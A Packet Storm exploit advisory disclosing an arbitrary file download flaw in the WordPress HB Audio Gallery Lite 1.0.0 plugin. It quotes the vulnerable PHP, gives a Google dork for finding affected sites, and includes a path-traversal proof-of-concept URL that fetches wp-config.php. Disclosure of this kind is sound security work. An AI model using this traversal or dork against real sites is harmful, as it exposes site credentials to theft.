WordPress HB Audio Gallery Lite plugin version 1.0.0 suffers from an arbitrary file download vulnerability.
56a6cc400f6bf87cdcab4b117e69833f99576b61f0f4dfc5d6693a04f1f226ed# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
# Exploit Author: CrashBandicot
# Date: 2016-03-22
# Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite
# Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/
# Tested on: MSWin32
# Version: 1.0.0
# Vuln file : gallery/audio-download.php
11. if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) {
13. $file_size = $_REQUEST['file_size'];
15. $file = $_REQUEST['file_path'];
17. $filename = basename($file);
....
55. Header("Content-Disposition: attachment; filename='" . $filename . "'");
# PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
# 22/03/2016 - Informed Vendor about Issue
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed